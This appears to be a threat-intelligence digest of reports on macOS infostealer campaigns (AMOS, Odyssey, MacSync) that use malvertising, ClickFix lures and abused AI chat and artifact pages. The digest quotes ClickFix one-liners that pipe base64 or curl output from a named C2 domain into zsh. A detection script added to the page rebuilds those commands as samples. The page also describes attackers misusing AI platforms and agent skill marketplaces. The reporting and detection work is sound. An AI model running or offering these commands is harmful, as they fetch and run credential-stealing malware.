- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The Atomic infostealer has been active since at least April 2023.
  First reported: 22.09.2025 22:44 · 3 sources, 5 articles. Sources:
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- The campaign targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms.
  First reported: 18.10.2025 18:02 · 2 sources, 3 articles. Sources:
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
-
The campaign employs 'ClickFix' techniques to trick targets into executing commands in Terminal.
First reported: 18.10.2025 18:02 · 2 sources, 5 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The campaign uses Google Ads to drive traffic to malicious sites and promote them in Google Search results.
First reported: 18.10.2025 18:02 · 2 sources, 4 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The malicious sites feature convincing download portals for fake apps and instruct users to copy a curl command in their Terminal to install them.
First reported: 18.10.2025 18:02 · 2 sources, 4 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The commands fetch and decode an 'install.sh' file, which downloads a payload binary, removing quarantine flags and bypassing Gatekeeper prompts.
First reported: 18.10.2025 18:02 · 2 sources, 4 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The payload is either AMOS or Odyssey, executed on the machine after checking if the environment is a virtual machine or an analysis system.
First reported: 18.10.2025 18:02 · 2 sources, 3 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The malware invokes sudo to run commands as root and collects detailed hardware and memory information of the host.
First reported: 18.10.2025 18:02 · 2 sources, 3 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The malware manipulates system services like killing OneDrive updater daemons and interacts with macOS XPC services to blend its malicious activity with legitimate processes.
First reported: 18.10.2025 18:02 · 2 sources, 2 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The malware harvests sensitive information stored in the browser and cryptocurrency credentials, and exfiltrates them to the command-and-control (C2) server.
First reported: 18.10.2025 18:02 · 2 sources, 4 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
Odyssey Stealer is a relatively new family derived from the Poseidon Stealer, which itself was forked from AMOS.
First reported: 18.10.2025 18:02 · 2 sources, 3 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Odyssey Stealer targets credentials and cookies stored in Chrome, Firefox, and Safari browsers, over a hundred cryptocurrency wallet extensions, Keychain data, and personal files.
First reported: 18.10.2025 18:02 · 2 sources, 3 articles
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
A new AMOS infostealer campaign abuses Google search ads to lure users into Grok and ChatGPT conversations that lead to installing the AMOS malware on macOS.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The campaign was first spotted by researchers at Kaspersky, with a more detailed report by Huntress.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The ClickFix attack begins with victims searching for macOS-related terms, leading to malicious instructions in AI chats.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The malicious instructions are hosted on legitimate LLM platforms and contain commands to install the malware.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The base64-encoded URL decodes into a bash script that loads a fake password prompt dialog.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The script validates, stores, and uses the provided password to execute privileged commands, including downloading and executing the AMOS infostealer.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
AMOS was first documented in April 2023 and is a malware-as-a-service (MaaS) operation targeting macOS systems exclusively.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
AMOS added a backdoor module earlier this year, allowing operators to execute commands, log keystrokes, and drop additional payloads.
First reported: 11.12.2025 01:50 · 2 sources, 2 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
AMOS is dropped as a hidden file and scans for cryptocurrency wallets, browser data, macOS Keychain data, and files on the filesystem.
First reported: 11.12.2025 01:50 · 2 sources, 3 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
Persistence is achieved via a LaunchDaemon running a hidden AppleScript that restarts the malware if terminated.
First reported: 11.12.2025 01:50 · 2 sources, 3 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
Users are advised to be vigilant and avoid executing commands they found online, especially if they don't fully understand what they do.
First reported: 11.12.2025 01:50 · 2 sources, 3 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
Kaspersky noted that asking ChatGPT if the provided instructions are safe reveals they are not.
First reported: 11.12.2025 01:50 · 2 sources, 3 articles
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
Microsoft has warned that information-stealing attacks are rapidly expanding beyond Windows to target Apple macOS environments by leveraging cross-platform languages like Python and abusing trusted platforms for distribution at scale.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The tech giant's Defender Security Research Team observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like Atomic macOS Stealer (AMOS), MacSync, and DigitStealer.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The campaigns use techniques like fileless execution, native macOS utilities, and AppleScript automation to facilitate data theft, including web browser credentials and session data, iCloud Keychain, and developer secrets.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
The starting point of these attacks is often a malicious ad, often served through Google Ads, that redirects users searching for tools like DynamicLake and artificial intelligence (AI) tools to fake sites that employ ClickFix lures, tricking them into infecting their own machines with malware.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead. They are typically distributed via phishing emails and collect login credentials, session cookies, authentication tokens, credit card numbers, and crypto wallet data.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
One such stealer is PXA Stealer, which is linked to Vietnamese-speaking threat actors and is capable of harvesting login credentials, financial information, and browser data.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Microsoft identified two PXA Stealer campaigns in October 2025 and December 2025 that used phishing emails for initial access.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Attack chains involved the use of registry Run keys or scheduled tasks for persistence and Telegram for command-and-control communications and data exfiltration.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Bad actors have been observed weaponizing popular messaging apps like WhatsApp to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Other stealer-related attacks have revolved around fake PDF editors like Crystal PDF that are distributed via malvertising and search engine optimization (SEO) poisoning through Google Ads to deploy a Windows-based stealer that can stealthily collect cookies, session data, and credential caches from Mozilla Firefox and Chrome browsers.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
To counter the threat posed by infostealer threats, organizations are advised to educate users on social engineering attacks like malvertising redirect chains, fake installers, and ClickFix-style copy-paste prompts. It's also advised to monitor for suspicious Terminal activity and access to the iCloud Keychain, as well as inspect network egress for POST requests to newly registered or suspicious domains.
First reported: 04.02.2026 09:42 · 1 source, 1 article
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.
First reported: 04.02.2026 09:42 · 2 sources, 3 articles
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
AMOS infostealer is being distributed through a new campaign called 'ClawHavoc', which targets the OpenClaw and ClawHub AI assistant ecosystem by poisoning its skill marketplace with malicious add-ons.
First reported: 12.02.2026 16:25 · 1 source, 2 articles
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The ClawHavoc campaign bundles AMOS malware within seemingly legitimate OpenClaw skills, such as crypto tools, productivity utilities, YouTube helpers, and Google Workspace integrations, to steal credentials, crypto wallet data, browser sessions, SSH keys, and other sensitive data.
First reported: 12.02.2026 16:25 · 1 source, 1 article
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
The AMOS ecosystem operates as a structured Malware-as-a-Service (MaaS) supply chain, where developers provide the stealer platform and infrastructure for a subscription cost (~$1,000/month), and downstream actors customize distribution channels (e.g., malvertising, fake installers, phishing, SEO poisoning, supply-chain abuse) to maximize infection volume.
First reported: 12.02.2026 16:25 · 1 source, 1 article
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
Stolen AMOS logs (credentials, PII, session data) are traded in underground markets and used by secondary actors such as access brokers, account takeover specialists, and crypto cash-out operators for follow-on attacks, including SaaS account compromise, financial fraud, and ransomware initial access.
First reported: 12.02.2026 16:25 · 1 source, 1 article
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
The AMOS infostealer prioritizes speed, data coverage, and stealth over persistence or lateral movement, enabling attackers to quickly convert stolen data into actionable access for monetization.
First reported: 12.02.2026 16:25 · 1 source, 1 article
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
Threat actors are abusing **Claude AI artifacts** (publicly shared LLM-generated content) and **Google Ads** to distribute Mac infostealers via ClickFix attacks, targeting queries like 'online DNS resolver,' 'macOS CLI disk space analyzer,' and 'HomeBrew.'
First reported: 13.02.2026 22:21 · 1 source, 1 article
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The malicious Claude artifact received **over 15,600 views**, indicating a high potential victim count, with a growth from 12,300 views in just a few days.
First reported: 13.02.2026 22:21 · 1 source, 1 article
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The attack uses two command variants: `echo "..." | base64 -D | zsh` and `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh` to fetch the **MacSync infostealer** payload.
First reported: 13.02.2026 22:21 · 1 source, 1 article
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
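An added detection example, not code from any of the cited reports, that serves both the monitoring advice above (watch Terminal activity for ClickFix copy-paste commands) and the two command variants just described: it scores recorded shell command lines for the `base64 -D | zsh` and `curl -SsLfk ... | zsh` shapes, rejoins quote-split tokens such as `cur""l`, decodes an inline base64 stage to see what it would hand to the shell, and matches the two domains the reports name. The sample telemetry, the placeholder URL path and the severity scheme are constructed assumptions.

```python
"""Flag ClickFix-style one-liners in shell command telemetry.

Added detection example, not code from the reports. The rules mirror the two
command shapes described for this campaign (echo ... | base64 -D | zsh and
curl -SsLfk ... | zsh), the quote-split trick (cur""l) and the two domains
the reports name; the log lines at the bottom are constructed samples.
"""
import base64
import binascii
import re
from typing import List, Optional

# Domains named in the reports (written there as raxelpak[.]com and
# a2abotnet[.]com); refanged so they match what an EDR records.
KNOWN_C2 = ("raxelpak.com", "a2abotnet.com")

# Something piped straight into an interpreter: "| zsh", "| bash -c", "| /bin/sh"
SHELL_SINK = re.compile(r"\|\s*(?:/bin/)?(?:zsh|bash|sh)\b")
# A base64 decode step (-D is the macOS spelling, -d/--decode the GNU one)
B64_DECODE = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")
# curl with certificate checking disabled, as in -SsLfk or --insecure
CURL_INSECURE = re.compile(r"\bcurl\b[^|]*?(?:--insecure|\s-[A-Za-z]*k[A-Za-z]*)(?=\s|$)")
# The literal handed to echo before a base64 decode
ECHO_B64 = re.compile(r'\becho\s+(?:-n\s+)?["\']?([A-Za-z0-9+/=]{16,})["\']?\s*\|')
# An empty quote pair wedged inside a token, e.g. cur""l or z''sh
SPLIT_TOKEN = re.compile(r"(?<=\S)(?:\"\"|'')(?=\S)")


def normalize(cmd: str) -> str:
    """Rejoin tokens split with empty quotes so cur""l reads as curl."""
    return SPLIT_TOKEN.sub("", cmd)


def decode_embedded_base64(cmd: str) -> Optional[str]:
    """Return the text an `echo <b64> | base64 -D` stage would hand to the shell."""
    m = ECHO_B64.search(cmd)
    if not m or not B64_DECODE.search(cmd):
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def assess(raw_cmd: str) -> dict:
    """Score one recorded command line; 'high' means treat it as an infection attempt."""
    cmd = normalize(raw_cmd)
    reasons: List[str] = []
    has_sink = SHELL_SINK.search(cmd) is not None
    if has_sink and B64_DECODE.search(cmd):
        reasons.append("base64-decoded text piped into a shell")
    if has_sink and CURL_INSECURE.search(cmd):
        reasons.append("curl with TLS verification disabled piped into a shell")
    if cmd != raw_cmd:
        reasons.append("token split with empty quotes (evasion)")
    decoded = decode_embedded_base64(cmd)
    # Look for the C2 domains in the visible command and in what it decodes to.
    haystack = cmd if decoded is None else cmd + "\n" + decoded
    for domain in KNOWN_C2:
        if domain in haystack:
            reasons.append(f"references reported C2 domain {domain}")
    if reasons:
        severity = "high"
    elif has_sink and re.search(r"\bcurl\b", cmd):
        # Same shape as legitimate "curl ... | bash" installers (the real
        # Homebrew one included), so only medium: worth a look, not an alert.
        reasons.append("curl output piped into a shell")
        severity = "medium"
    else:
        severity = "none"
    return {"command": raw_cmd, "severity": severity, "reasons": reasons, "decoded": decoded}


def scan(events):
    """Return assessments for every command line that is not clean."""
    return [r for r in (assess(e) for e in events) if r["severity"] != "none"]


# Constructed sample telemetry. The second-stage URL path is a placeholder;
# the reports only describe it as a hash.
_STAGE2 = 'curl -SsLfk "https://raxelpak.com/curl/PLACEHOLDER-HASH" | zsh'
_B64 = base64.b64encode(_STAGE2.encode()).decode()
SAMPLE_EVENTS = [
    f'echo "{_B64}" | base64 -D | zsh',
    'true && cur""l -SsLfk --compressed "https://raxelpak.com/curl/PLACEHOLDER-HASH" | zsh',
    "brew install wget",
    'echo "aGVsbG8gd29ybGQK" | base64 -D',
    "curl -fsSL https://example.com/install.sh | bash",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f'[{hit["severity"]}] {hit["command"]}')
        for reason in hit["reasons"]:
            print("   -", reason)
```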
The MacSync infostealer communicates with C2 via a **hardcoded token and API key**, spoofs a macOS browser user-agent, and exfiltrates data to `a2abotnet[.]com/gate` in a ZIP archive (`/tmp/osalogging.zip`).
First reported: 13.02.2026 22:21 · 1 source, 1 article
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
If exfiltration fails, the malware **splits the archive into chunks** and retries up to **eight times** before cleaning up traces.
First reported: 13.02.2026 22:21 · 1 source, 1 article
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
Both attack variants fetch the second-stage payload from the **same C2 (raxelpak[.]com)**, suggesting a **single threat actor** behind the campaigns.
First reported: 13.02.2026 22:21 · 1 source, 1 article
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
The abuse of **Claude artifacts** marks an expansion from prior campaigns using **ChatGPT/Grok shared chats**, demonstrating threat actors’ adaptation to new LLM platforms for distribution.
First reported: 13.02.2026 22:21 · 1 source, 1 article
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
Similar Happenings
Fake AI Assistant Extensions in Google Chrome Web Store Exfiltrate Credentials and Monitor Emails
Over 260,000 Google Chrome users downloaded fake AI assistant extensions that steal login credentials, monitor emails, and enable remote access. Researchers at LayerX identified over 30 malicious extensions as part of a coordinated campaign called AiFrame. The extensions mimicked popular AI assistants like Claude AI, ChatGPT, Grok, and Google Gemini. The campaign used extension spraying to evade takedowns, directing users to remote infrastructure to avoid detection. The extensions exfiltrate data from Chrome and Gmail to attacker-controlled servers. LayerX warns that these extensions act as general-purpose access brokers, capable of harvesting data and monitoring user behavior. Many extensions have been removed from the Chrome Web Store, but users who downloaded them remain at risk. Additionally, cybersecurity researchers have discovered a malicious Google Chrome extension named CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl) that steals TOTP codes for Facebook and Meta Business accounts, Business Manager contact lists, and analytics data. The extension exfiltrates data to infrastructure controlled by the threat actor, including a backend at getauth[.]pro and a Telegram channel. The extension has 33 users as of writing and was first uploaded to the Chrome Web Store on March 1, 2025. About 500,000 VKontakte users have had their accounts silently hijacked through Chrome extensions masquerading as VK customization tools. The large-scale campaign has been codenamed VK Styles. The malware embedded in the extensions is designed to engage in active account manipulation by automatically subscribing users to the attacker's VK groups, resetting account settings every 30 days to override user preferences, manipulating CSRF tokens to bypass VK's security protections, and maintaining persistent control. 
The activity has been traced to a threat actor operating under the GitHub username 2vk, who has relied on VK's own social network to distribute malicious payloads and build a follower base through forced subscriptions. A report published by Q Continuum found a huge collection of 287 Chrome extensions that exfiltrate browsing history to data brokers. These extensions have 37.4 million installations, representing roughly 1% of the global Chrome userbase.
China-Linked Amaranth-Dragon Exploits WinRAR Flaw in Southeast Asian Espionage Campaigns
Amaranth-Dragon, a China-linked threat actor, has conducted targeted espionage campaigns against government and law enforcement agencies in Southeast Asia throughout 2025. The group exploited CVE-2025-8088, a WinRAR vulnerability, to deliver malicious payloads, including the Havoc C2 framework and TGAmaranth RAT. The campaigns were timed to coincide with sensitive political and security events, demonstrating a high degree of stealth and operational discipline. The group's tactics, tools, and procedures (TTPs) show strong links to APT41, suggesting a shared ecosystem or resource pool. The attackers leveraged the vulnerability within days of its disclosure in August 2025 and used the Havoc Framework as the Command and Control (C&C) platform.
341 Malicious ClawHub Skills Target OpenClaw Users with Atomic Stealer
A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware, highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks. New findings reveal almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool can lead users to install information-stealing malware. These add-ons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands, which then steal crypto assets such as exchange API keys, wallet private keys, SSH credentials, and browser passwords.
Android Malware Campaign Abuses Hugging Face Platform
A new Android malware campaign leverages the Hugging Face platform to distribute thousands of variants of an APK payload designed to steal credentials from popular financial and payment services. The attack begins with a dropper app called TrustBastion, which uses scareware-style ads to lure victims into installing it. The malware then redirects to a Hugging Face repository to download the final payload, using server-side polymorphism to evade detection. The malware exploits Android’s Accessibility Services to capture screenshots, monitor user activity, and steal credentials. The campaign was discovered by Bitdefender researchers, who found over 6,000 commits in the repository. The repository was taken down but resurfaced under a new name, 'Premium Club,' with the same malicious code. Bitdefender has published indicators of compromise and informed Hugging Face, which removed the malicious datasets. The infection chain begins when users download the malicious Android app TrustBastion, which appears as scareware via popups claiming the device is infected with malware. The dropper app prompts users to run an update that mimics legitimate Google Play and Android system update dialog boxes. The dropper contacts an encrypted endpoint hosted at trustbastion[.]com, which returns an HTML file containing a redirect link to the Hugging Face repository hosting the malware. The malware masquerades as a 'Phone Security' feature to guide users through enabling Accessibility Services. The malware requests permissions for screen recording, screen casting, and overlay display to monitor all user activity and capture screen content. The malware captures lockscreen information for security verification of financial and payment services.
Malicious OpenClaw AI Coding Assistant Extension on VS Code Marketplace
A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts. The extension was taken down by Microsoft after being reported by cybersecurity researchers. The malicious extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts. The extension also incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads. Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks. However, insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access. More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data like API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks. A self-styled social networking platform built for AI agents, Moltbook, contained a misconfigured database that allowed full read and write access to all data. 
The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The API key exposure allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent. Unauthenticated users could edit existing posts, inject malicious content or prompt injection payloads, and deface the site. SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.